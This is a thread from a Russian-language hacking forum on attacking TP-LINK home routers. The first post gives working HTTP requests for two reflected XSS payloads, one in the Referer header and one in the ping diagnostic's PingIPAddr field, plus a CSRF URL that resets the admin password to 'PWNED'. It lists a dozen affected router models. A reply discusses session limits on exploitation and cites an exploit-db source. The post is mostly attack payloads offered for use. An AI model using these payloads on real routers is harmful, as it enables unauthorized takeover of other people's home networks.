Взлом TP-LINK Роутера | Используем XSS-уязвимость

Discussion in 'Песочница' started by Mican, 11 Oct 2015.

  1. Mican

    Mican New Member

    Joined:
    11 Oct 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    1
    1. Отраженная XSS-уязвимость неавторизованных пользователей в поле "Referer" при обращении к несуществующим URL-адресам на роутере.

    Code:
    GET /doesnotexist HTTP/1.1
    Host: 192.168.1.1
    Referer: http://mican"><script>alert("XSS")</script>
    Connection: keep-alive
    2. Отраженная XSS-уязвимость но уже для авторизованных пользователей, в одной из диагностических команд - ping - на странице /Forms/tools_test_1 в аргументе PingIPAddr.

    Code:
    Host: <IP>
    Referer: http://<IP>/maintenance/tools_test.htm
    Authorization: Basic blablabla==
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 164
    Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingfl ag=1&trace_open_fl ag=0&InfoDisplay=Ping+request+could+not+fi nd+host+
    3. CSRF-уязвимость позволяет сбросить пароль администратора. Для атаки создаем HTML-страницу, которая отправляет следующий запрос:
    Code:
    http://<IP>/Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfi rm=PWNED
    WDR740ND, WDR740N, WR743ND, WR842ND, WA-901ND, WR941N, WR941ND, WR1043ND, WR2543ND, MR3220, MR3020, WR841N
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    сложность в том, что сессия там держится не долго, т. е. жертва обязательно должна сама авторизоваться у себя в роутере перед эксплуатацией - что сделать довольно сложно. разве что, предположить, что там дефолтные логин и пароль.
    принято указывать источник: https://www.exploit-db.com/exploits/28055/
     
    _________________________
    grimnir and Mican like this.